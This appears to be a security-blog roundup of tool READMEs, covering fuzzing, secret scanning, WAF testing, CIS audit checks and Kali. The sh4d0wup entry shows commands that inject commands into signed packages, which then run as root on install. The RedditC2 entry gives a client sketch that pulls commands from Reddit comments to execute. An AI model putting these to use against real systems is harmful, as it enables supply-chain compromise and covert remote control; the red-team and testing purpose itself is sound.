sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml fuzz -j 10 -t 10m

This will start a fuzzing run on 10 cores, with a timeout of 10 minutes. Output produced by the fuzzer is stored in the directory defined by the work-directory attribute in the target's config file. In case of pngtopng, the default location is /tmp/pngtopng-pngtopng.

If the working directory already exists, --purge must be passed as an argument to fuzztruction to allow it to rerun. The flag must be passed before the subcommand, i.e., before fuzz or benchmark.
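For example, to rerun the fuzzing campaign from above on top of an existing working directory:

sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml --purge fuzz -j 10 -t 10m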

Combining Fuzztruction and AFL++

For running AFL++ alongside Fuzztruction, the aflpp subcommand can be used to spawn AFL++ workers that are reseeded during runtime with inputs found by Fuzztruction. Assuming that Fuzztruction was executed using the command above, it is sufficient to execute

sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml aflpp -j 10 -t 10m

for spawning 10 AFL++ processes that are terminated after 10 minutes. Inputs found by Fuzztruction and AFL++ are periodically synced into the interesting folder in the working directory. In case AFL++ should be executed independently but based on the same .yml configuration file, the --suffix argument can be used to append a suffix to the working directory of the spawned fuzzer.
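For instance, to run an independent AFL++-only campaign from the same configuration into a separate working directory, something like the following should work (the exact flag placement is an assumption; consult --help):

sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml aflpp -j 10 -t 10m --suffix aflpp-only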

Computing Coverage

After the fuzzing run has terminated, the tracer subcommand allows you to retrieve a list of covered basic blocks for all interesting inputs found during fuzzing. These traces are stored in the traces subdirectory of the working directory. Each trace contains a zlib-compressed JSON object with the addresses of all basic blocks (in execution order) exercised during execution. Furthermore, metadata to map the addresses to the actual ELF file they are located in is provided.

The coverage tool located at ./target/debug/coverage can be used to process the collected data further. You need to pass it the top-level directory containing working directories created by Fuzztruction (e.g., /tmp in case of the previous example). Executing ./target/debug/coverage /tmp will generate a .csv file that maps time to the number of covered basic blocks and a .json file that maps timestamps to sets of found basic block addresses. Both files are located in the working directory of the specific fuzzing run.
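Taken together, a post-processing pass might look like the following sketch (the tracer invocation here mirrors the fuzz and aflpp subcommands above and is an assumption; consult --help for additional flags):

# Trace covered basic blocks for all interesting inputs, then aggregate
sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml tracer
./target/debug/coverage /tmp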



Sh4D0Wup - Signing-key Abuse And Update Exploitation Framework


Signing-key abuse and update exploitation framework.

% docker run -it --rm ghcr.io/kpcyrd/sh4d0wup:edge -h
Usage: sh4d0wup [OPTIONS] <COMMAND>

Commands:
bait Start a malicious update server
front Bind a http/https server but forward everything unmodified
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Interact with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
req Emulate a http request to test routing and selectors
completions Generate shell completions
help Print this message or the help of the given subcommand(s)

Options:
-v, --verbose... Increase logging output (can be used multiple times)
-q, --quiet... Reduce logging output (can be used multiple times)
-h, --help Print help information
-V, --version Print version information

What are shadow updates?

Have you ever wondered if the update you downloaded is the same one everybody else gets or did you get a different one that was made just for you? Shadow updates are updates that officially don't exist but carry valid signatures and would get accepted by clients as genuine. This may happen if the signing key is compromised by hackers or if a release engineer with legitimate access turns grimy.

sh4d0wup is a malicious http/https update server that acts as a reverse proxy in front of a legitimate server and can infect + sign various artifact formats. Attacks are configured in plots that describe how http request routing works, how artifacts are patched/generated, how they should be signed, and with which key. A route can have selectors so it matches only if, e.g., the user-agent matches a pattern or the client is connecting from a specific IP address. For development and testing, mock signing keys/certificates can be generated and marked as trusted.

Compile a plot

Some plots are more complex to run than others; to avoid long startup times due to downloads and artifact patching, you can build a plot in advance. This also allows you to create signatures in advance.

sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst

Run a plot

This spawns a malicious http update server according to the plot. The command also accepts yaml files, but they may take longer to start.

sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst

Example plots can be found in the contrib/ directory of the repository.

Infect an artifact

sh4d0wup infect elf

% sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Spawning C compiler...
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Generating source code...
[2022-12-19T23:50:57Z INFO sh4d0wup::infect::elf] Waiting for compile to finish...
[2022-12-19T23:51:01Z INFO sh4d0wup::infect::elf] Successfully generated binary
% ./a.out help
uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
Usage: a.out [OPTIONS] <COMMAND>

Commands:
bait Start a malicious update server
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Interact with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
completions Generate shell completions
help Print this message or the help of the given subcommand(s)

Options:
-v, --verbose... Turn debugging information on
-h, --help Print help information

sh4d0wup infect pacman

% sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
[2022-12-09T16:08:11Z INFO sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
% sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
loading packages...
resolving dependencies...
looking for conflicting packages...

Packages (1) sh4d0wup-0.2.0-2

Total Installed Size: 13.36 MiB
Net Upgrade Size: 0.00 MiB

:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring [#######################################] 100%
(1/1) checking package integrity [#######################################] 100%
(1/1) loading package files [#######################################] 100%
(1/1) checking for file conflicts [#######################################] 100%
(1/1) checking available disk space [#######################################] 100%
:: Processing package changes...
(1/1) upgrading sh4d0wup [#######################################] 100%
uid=0(root) gid=0(root) groups=0(root)
:: Running post-transaction hooks...
(1/2) Arming ConditionNeedsUpdate...
(2/2) Notifying arch-audit-gtk

sh4d0wup infect deb

% sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1
[2022-12-09T16:28:02Z INFO sh4d0wup::infect::deb] Patching "control.tar.xz"
% sudo apt install ./apt_2.2.4-1_amd64.deb
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'
Suggested packages:
apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base
Recommended packages:
ca-certificates
The following packages will be upgraded:
apt
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B/1491 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]
debconf: delaying package configuration, since apt-utils is not installed
(Reading database ... 6661 files and directories currently installed.)
Preparing to unpack /apt_2.2.4-1_amd64.deb ...
Unpacking apt (2.2.4-1) over (2.2.4) ...
Setting up apt (2.2.4-1) ...
uid=0(root) gid=0(root) groups=0(root)
Processing triggers for libc-bin (2.31-13+deb11u5) ...

sh4d0wup infect oci

Bruteforce git commit partial collisions

Here's a short oneliner that takes the latest commit from a git repository, sends it to a remote computer that has sh4d0wup installed to tweak it until the commit id starts with the provided --collision-prefix, and then inserts the new commit back into the repository on your local computer:

% git cat-file commit HEAD | ssh lots-o-time nice sh4d0wup tamper git-commit --stdin --collision-prefix 7777 --strip-header | git hash-object -w -t commit --stdin

This may take some time; eventually it prints a commit id that you can use to create a new branch:

git show 777754fde8...
git branch some-name 777754fde8...


auditpolCIS - CIS Benchmark Testing Of Windows SIEM Configuration


CIS Benchmark testing of Windows SIEM configuration

This is an application for testing the configuration of Windows Audit Policy settings against the CIS Benchmark recommended settings. A few points:

  • The tested system was Windows Server 2019, and the benchmark used was also Windows Server 2019.
  • The script connects with SSH. SSH is included with Windows Server 2019; it just has to be enabled. If you would like to see WinRM (or other) connection types, let me know or send a PR.
  • Some tests are included here which were not included in the CIS guide. The recommended settings for these Subcategories are based on the logging volume for these events, versus the security value. In nearly all cases, the recommendation is to turn off auditing for these settings.
  • The YAML file cis-benchmarks.yaml is the YAML representation of the CIS Benchmark guideline for each Subcategory.
  • The command run under SSH is auditpol /get /category:*
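For reference, the output of that command resembles the following excerpt (the subcategories and settings shown here are illustrative and vary per system):

System audit policy
Category/Subcategory                    Setting
System
  Security System Extension             No Auditing
  System Integrity                      Success and Failure
Logon/Logoff
  Logon                                 Success and Failure
  Logoff                                Success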


Further details on usage and other background info are at https://www.seven-stones.biz/blog/auditpolcis-automating-windows-siem-cis-benchmarks-testing/



Scriptkiddi3 - Streamline Your Recon And Vulnerability Detection Process With SCRIPTKIDDI3, A Recon And Initial Vulnerability Detection Tool Built Using Shell Script And Open Source Tools


Streamline your recon and vulnerability detection process with SCRIPTKIDDI3, A recon and initial vulnerability detection tool built using shell script and open source tools.

How it works • Installation • Usage • MODES • For Developers • Credits

Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.

SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.

In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.

SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3

[Thanks ChatGPT for the Description]


How it Works?

This tool mainly performs 3 tasks

  1. Effective Subdomain Enumeration from Various Tools
  2. Get URLs with open HTTP and HTTPS service.
  3. Run Nuclei and other scans on the previous output.

So basically, this is an automation script for your initial recon in bug bounty.

Install SCRIPTKIDDI3

SCRIPTKIDDI3 requires different tools to run successfully. Run the following command to install the latest version with all requirements:

git clone https://github.com/thecyberneh/scriptkiddi3.git
cd scriptkiddi3
bash installer.sh

Usage

scriptkiddi3 -h

This will display help for the tool. Here are all the switches it supports.

[ABOUT:]
Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
A recon and initial vulnerability detection tool built using shell script and open source tools.


[Usage:]
scriptkiddi3 [MODE] [FLAGS]
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


[MODES:]
['-m'/'--mode']
Available Options for MODE:
SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
URL | url Run scriptkiddi3 in URL ENUMERATION mode
EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode


Features of EXPLOIT mode: subdomain enumeration, URL enumeration,
Vulnerability Detection with Nuclei,
and Scan for SUBDOMAIN TAKEOVER

[FLAGS:]
[TARGET:] -d, --domain target domain to scan

[CONFIG:] -c, --config path of your configuration file for subfinder

[HELP:] -h, --help to get help menu

[UPDATE:] -u, --update to update tool

[Examples:]
Run scriptkiddi3 in full Exploitation mode
scriptkiddi3 -m EXP -d target.com


Use your own CONFIG file for subfinder
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
scriptkiddi3 -m SUB -d target.com


Run scriptkiddi3 in URL ENUMERATION mode
scriptkiddi3 -m URL -d target.com

MODES

1. FULL EXPLOITATION MODE

Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE

  scriptkiddi3 -m EXP -d target.com

FULL EXPLOITATION MODE contains following functions

  • Effective Subdomain Enumeration with different services and open source tools
  • Effective URL Enumeration ( HTTP and HTTPs service )
  • Run Vulnerability Detection with Nuclei
  • Subdomain Takeover Test on previous results

2. SUBDOMAIN ENUMERATION MODE

Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE

  scriptkiddi3 -m SUB -d target.com

SUBDOMAIN ENUMERATION MODE contains following functions

  • Effective Subdomain Enumeration with different services and open source tools
  • You can use this mode if you only want to get subdomains from this tool, in other words, automation of subdomain enumeration by different tools

3. URL ENUMERATION MODE

Run scriptkiddi3 in URL ENUMERATION MODE

  scriptkiddi3 -m URL -d target.com

URL ENUMERATION MODE contains following functions

  • Same features as SUBDOMAIN ENUMERATION MODE, but also identifies HTTP and HTTPS services

Using your own CONFIG File for subfinder

  scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml

You can also provide your own CONFIG file with your API keys for subdomain enumeration with subfinder.

Updating tool to latest version

You can run the following command to update the tool:

  scriptkiddi3 -u

An Example of config.yaml

binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sample-email@user.com:sample_password
securitytrails: []
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
- ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
- ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeye:
- zoomeye_username:zoomeye_password

For Developers

If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.

If you have any other queries, you can always contact me on Twitter(thecyberneh)

Credits

I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.



RedditC2 - Abusing Reddit API To Host The C2 Traffic, Since Most Of The Blue-Team Members Use Reddit, It Might Be A Great Way To Make The Traffic Look Legit


Abusing Reddit API to host the C2 traffic, since most of the blue-team members use Reddit, it might be a great way to make the traffic look legit.


[Disclaimer]: Use of this project is for Educational/Testing purposes only. Using it on unauthorised machines is strictly forbidden. If somebody is found to use it for illegal/malicious intent, the author of the repo will not be held responsible.


Requirements

Install PRAW library in python3:

pip3 install praw

Quickstart

See the Quickstart guide on how to get going right away!

Demo

Workflow

Teamserver

  1. Go to the specific Reddit Post & post a new comment with the command ("in: ")
  2. Read for new comment which includes the word "out:"
  3. If no such comment is found, go back to step 2
  4. Parse the comment, decrypt it and read its output
  5. Edit the existing comment to "executed", to avoid re-executing it

Client

  1. Go to the specific Reddit Post & read the latest comment which includes "in:"
  2. If no new comment is detected, go back to step 1
  3. Parse the command out of the comment, decrypt it and execute it locally
  4. Encrypt the command's output and reply to the respective comment ("out: ")

Below is a demonstration of the XOR-encrypted C2 traffic for understanding purposes:
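The original demo screenshot is not reproduced here. As a rough illustration of the client side, a polling loop using PRAW might look like the sketch below; the post URL, credentials, XOR key, and the hex encoding of payloads are all placeholder assumptions, not the project's actual implementation.

# Hypothetical client polling loop (all identifiers are placeholders)
import time
import praw

reddit = praw.Reddit(
    client_id="<client-id>",
    client_secret="<client-secret>",
    username="<bot-user>",
    password="<bot-password>",
    user_agent="redditc2-client",
)
post = reddit.submission(url="https://www.reddit.com/r/<sub>/comments/<post-id>/")

def xor(data: bytes, key: bytes) -> bytes:
    # repeating-key XOR used to obfuscate the traffic
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

KEY = b"<shared-key>"
while True:
    post.comments.replace_more(limit=0)  # flatten the comment tree
    for comment in post.comments.list():
        if comment.body.startswith("in:"):
            cmd = xor(bytes.fromhex(comment.body[3:].strip()), KEY).decode()
            # ... execute `cmd` locally, then reply with the encrypted output:
            # comment.reply("out: " + xor(output.encode(), KEY).hex())
    time.sleep(10)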

Scanning results

Since it is a custom C2 implant, it doesn't get detected by any AV, as the behaviour is completely legit.

TO-DO

  • Teamserver and agent compatible in Windows/Linux
  • Make the traffic encrypted
  • Add upload/download feature
  • Add persistence feature
  • Generate the agents dynamically (from the TeamServer)
  • Tab autocompletion

Credits

Special thanks to @T4TCH3R for working with me and contributing to this project.



Noseyparker - A Command-Line Program That Finds Secrets And Sensitive Information In Textual Data And Git History


Nosey Parker is a command-line tool that finds secrets and sensitive information in textual data. It is useful both for offensive and defensive security testing.

Key features:

  • It supports scanning files, directories, and the entire history of Git repositories
  • It uses regular expression matching with a set of 95 patterns chosen for high signal-to-noise based on experience and feedback from offensive security engagements
  • It groups matches together that share the same secret, further emphasizing signal over noise
  • It is fast: it can scan at hundreds of megabytes per second on a single core, and is able to scan 100GB of Linux kernel source history in less than 2 minutes on an older MacBook Pro

This open-source version of Nosey Parker is a reimplementation of the internal version that is regularly used in offensive security engagements at Praetorian. The internal version has additional capabilities for false positive suppression and an alternative machine learning-based detection engine. Read more in blog posts here and here.


Building from source

1. (On x86_64) Install the Hyperscan library and headers for your system

On macOS using Homebrew:

brew install hyperscan pkg-config

On Ubuntu 22.04:

apt install libhyperscan-dev pkg-config

1. (On non-x86_64) Build Vectorscan from source

You will need several dependencies, including cmake, boost, ragel, and pkg-config.

Download and extract the source for the 5.4.8 release of Vectorscan:

wget https://github.com/VectorCamp/vectorscan/archive/refs/tags/vectorscan/5.4.8.tar.gz && tar xfz 5.4.8.tar.gz

Build with cmake:

cd vectorscan-vectorscan-5.4.8 && cmake -B build -DCMAKE_BUILD_TYPE=Release . && cmake --build build

Set the HYPERSCAN_ROOT environment variable so that Nosey Parker builds against your from-source build of Vectorscan:

export HYPERSCAN_ROOT="$PWD/build"

Note: The Nosey Parker Dockerfile builds Vectorscan from source and links against that.

2. Install the Rust toolchain

Recommended approach: install from https://rustup.rs

3. Build using Cargo

cargo build --release

This will produce a binary at target/release/noseyparker.

Docker Usage

A prebuilt Docker image is available for the latest release for x86_64:

docker pull ghcr.io/praetorian-inc/noseyparker:latest

A prebuilt Docker image is available for the most recent commit for x86_64:

docker pull ghcr.io/praetorian-inc/noseyparker:edge

For other architectures (e.g., ARM) you will need to build the Docker image yourself:

docker build -t noseyparker .

Run the Docker image with a mounted volume:

docker run -v "$PWD":/opt/ noseyparker

Note: The Docker image runs noticeably slower than a native binary, particularly on macOS.

Usage quick start

The datastore

Most Nosey Parker commands use a datastore. This is a special directory that Nosey Parker uses to record its findings and maintain its internal state. A datastore will be implicitly created by the scan command if needed. You can also create a datastore explicitly using the datastore init -d PATH command.
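For example, to create a datastore explicitly before scanning:

$ noseyparker datastore init -d np.example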

Scanning filesystem content for secrets

Nosey Parker has built-in support for scanning files, recursively scanning directories, and scanning the entire history of Git repositories.

For example, if you have a Git clone of CPython locally at cpython.git, you can scan its entire history with the scan command. Nosey Parker will create a new datastore at np.cpython and save its findings there.

$ noseyparker scan --datastore np.cpython cpython.git
Found 28.30 GiB from 18 plain files and 427,712 blobs from 1 Git repos [00:00:04]
Scanning content β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 100% 28.30 GiB/28.30 GiB [00:00:53]
Scanned 28.30 GiB from 427,730 blobs in 54 seconds (538.46 MiB/s); 4,904/4,904 new matches

Rule Distinct Groups Total Matches
───────────────────────────────────────────────────────────
PEM-Encoded Private Key 1,076 1,192
Generic Secret 331 478
netrc Credentials 42 3,201
Generic API Key 2 31
md5crypt Hash 1 2

Run the `report` command next to show finding details.

Scanning Git repos by URL, GitHub username, or GitHub organization name

Nosey Parker can also scan Git repos that have not already been cloned to the local filesystem. The --git-url URL, --github-user NAME, and --github-org NAME options to scan allow you to specify repositories of interest.

For example, to scan the Nosey Parker repo itself:

$ noseyparker scan --datastore np.noseyparker --git-url https://github.com/praetorian-inc/noseyparker

For example, to scan accessible repositories belonging to octocat:

$ noseyparker scan --datastore np.noseyparker --github-user octocat

These input specifiers will use an optional GitHub token if available in the NP_GITHUB_TOKEN environment variable. Providing an access token gives a higher API rate limit and may make additional repositories accessible to you.

See noseyparker help scan for more details.

Summarizing findings

Nosey Parker prints out a summary of its findings when it finishes scanning. You can also run this step separately:

$ noseyparker summarize --datastore np.cpython

Rule Distinct Groups Total Matches
───────────────────────────────────────────────────────────
PEM-Encoded Private Key 1,076 1,192
Generic Secret 331 478
netrc Credentials 42 3,201
Generic API Key 2 31
md5crypt Hash 1 2

Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

Reporting detailed findings

To see details of Nosey Parker's findings, use the report command. This prints out a text-based report designed for human consumption:

(The example report output is omitted here; the findings it contains are synthetic, invalid secrets.) Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.
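For example, to emit the findings from the earlier CPython scan as JSON:

$ noseyparker report --datastore np.cpython --format=json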

Enumerating repositories from GitHub

To list URLs for repositories belonging to GitHub users or organizations, use the github repos list command. This command uses the GitHub REST API to enumerate repositories belonging to one or more users or organizations. For example:

$ noseyparker github repos list --user octocat
https://github.com/octocat/Hello-World.git
https://github.com/octocat/Spoon-Knife.git
https://github.com/octocat/boysenberry-repo-1.git
https://github.com/octocat/git-consortium.git
https://github.com/octocat/hello-worId.git
https://github.com/octocat/linguist.git
https://github.com/octocat/octocat.github.io.git
https://github.com/octocat/test-repo1.git

An optional GitHub Personal Access Token can be provided via the NP_GITHUB_TOKEN environment variable. Providing an access token gives a higher API rate limit and may make additional repositories accessible to you.

Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

See noseyparker help github for more details.

Getting help

Running the noseyparker binary without arguments prints top-level help and exits. You can get abbreviated help for a particular command by running noseyparker COMMAND -h.

Tip: More detailed help is available with the help command or long-form --help option.

Contributing

Contributions are welcome, particularly new regex rules. Developing new regex rules is detailed in a separate document.

If you are considering making significant code changes, please open an issue first to start discussion.

License

Nosey Parker is licensed under the Apache License, Version 2.0.

Any contribution intentionally submitted for inclusion in Nosey Parker by you, as defined in the Apache 2.0 license, shall be licensed as above, without any additional terms or conditions.



Waf-Bypass - Check Your WAF Before An Attacker Does


WAF bypass Tool is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads. Check your WAF before an attacker does. WAF Bypass Tool is developed by Nemesida WAF team with the participation of community.


How to run

It is forbidden to use this tool for illegal purposes. Don't break the law. We are not responsible for possible risks associated with the use of this software.

Run from Docker

The latest waf-bypass is always available via Docker Hub. It can easily be pulled with the following commands:

# docker pull nemesida/waf-bypass
# docker run nemesida/waf-bypass --host='example.com'

Run source code from GitHub

# git clone https://github.com/nemesida-waf/waf_bypass.git /opt/waf-bypass/
# python3 -m pip install -r /opt/waf-bypass/requirements.txt
# python3 /opt/waf-bypass/main.py --host='example.com'

Options

  • '--proxy' (--proxy='http://proxy.example.com:3128') - allows you to specify a proxy to connect through instead of connecting to the host directly.

  • '--header' (--header 'Authorization: Basic YWRtaW46YWRtaW4=' --header 'X-TOKEN: ABCDEF') - allows you to specify an HTTP header to send with all requests (e.g. for authentication). Multiple use is allowed.

  • '--user-agent' (--user-agent 'MyUserAgent 1/1') - allows you to specify the HTTP User-Agent to send with all requests, except when the User-Agent is set by the payload ("USER-AGENT").

  • '--block-code' (--block-code='403' --block-code='222') - allows you to specify the HTTP status code to expect when the request is blocked by the WAF (default is 403). Multiple use is allowed.

  • '--threads' (--threads=15) - allows you to specify the number of parallel scan threads (default is 10).

  • '--timeout' (--timeout=10) - allows you to specify the request processing timeout in seconds (default is 30).

  • '--json-format' - display the results in JSON format (useful for integrating the tool with security platforms).

  • '--details' - display the False Positive and False Negative payloads. Not available in JSON format.

  • '--exclude-dir' - exclude a payload directory (--exclude-dir='SQLi' --exclude-dir='XSS'). Multiple use is allowed.
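Several of these options can be combined in a single run; for example:

# docker run nemesida/waf-bypass --host='example.com' --block-code='403' --block-code='222' --threads=15 --json-format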

Payloads

Depending on the purpose, payloads are located in the appropriate folders:

  • FP - False Positive payloads
  • API - API testing payloads
  • CM - Custom HTTP Method payloads
  • GraphQL - GraphQL testing payloads
  • LDAP - LDAP Injection etc. payloads
  • LFI - Local File Include payloads
  • MFD - multipart/form-data payloads
  • NoSQLi - NoSQL injection payloads
  • OR - Open Redirect payloads
  • RCE - Remote Code Execution payloads
  • RFI - Remote File Inclusion payloads
  • SQLi - SQL injection payloads
  • SSI - Server-Side Includes payloads
  • SSRF - Server-side request forgery payloads
  • SSTI - Server-Side Template Injection payloads
  • UWA - Unwanted Access payloads
  • XSS - Cross-Site Scripting payloads

Write your own payloads

When compiling a payload, the following zones, method and options are used:

  • URL - request's path
  • ARGS - request's query
  • BODY - request's body
  • COOKIE - request's cookie
  • USER-AGENT - request's user-agent
  • REFERER - request's referer
  • HEADER - request's header
  • METHOD - request's method
  • BOUNDARY - specifies the contents of the request's boundary. Applicable only to payloads in the MFD directory.
  • ENCODE - specifies the type of payload encoding (Base64, HTML-ENTITY, UTF-16) in addition to the encoding for the payload. Multiple values are indicated with a space (e.g. Base64 UTF-16). Applicable only to the ARGS, BODY, COOKIE and HEADER zones. Not applicable to payloads in the API and MFD directories. Not compatible with the JSON option.
  • JSON - specifies that the request's body should be in JSON format
  • BLOCKED - specifies that the request should be blocked (FN testing) or not (FP)

Except for some cases described below, the zones are independent of each other and are tested separately (that is, if 2 zones are specified, the script will send 2 requests, checking one zone and then the other).

For the zones you can use the %RND% suffix, which allows you to generate an arbitrary string of 6 letters and numbers (e.g.: param%RND%=my_payload or param=%RND% OR A%RND%B).

You can create your own payloads. To do this, create your own folder in the '/payload/' directory, or place the payload in an existing one (e.g.: '/payload/XSS'). The allowed data format is JSON.
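As a purely hypothetical illustration of the zone vocabulary above (the JSON key names and structure here are assumptions; copy an existing file under '/payload/' for the real schema):

{
    "ARGS": "param=%RND% OR <script>alert(1)</script>",
    "BLOCKED": true
}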

API directory

API testing payloads located in this directory are automatically appended with a header 'Content-Type: application/json'.

MFD directory

For MFD (multipart/form-data) payloads located in this directory, you must specify the BODY (required) and BOUNDARY (optional). If BOUNDARY is not set, it will be generated automatically; in this case, only the payload must be specified for the BODY, without additional data ('... Content-Disposition: form-data; ...').

If a BOUNDARY is specified, then the content of the BODY must be formatted in accordance with the RFC, but this allows multiple payloads in the BODY, separated by the BOUNDARY.

Other zones are allowed in this directory (e.g.: URL, ARGS, etc.). Regardless of the zone, the header 'Content-Type: multipart/form-data; boundary=...' will be added to all requests.



Kali Linux 2023.1 - Penetration Testing and Ethical Hacking Linux Distribution


Time for another Kali Linux release! – Kali Linux 2023.1. This release has various impressive updates.

The changelog summary since the 2022.4 release from December:


More info here.

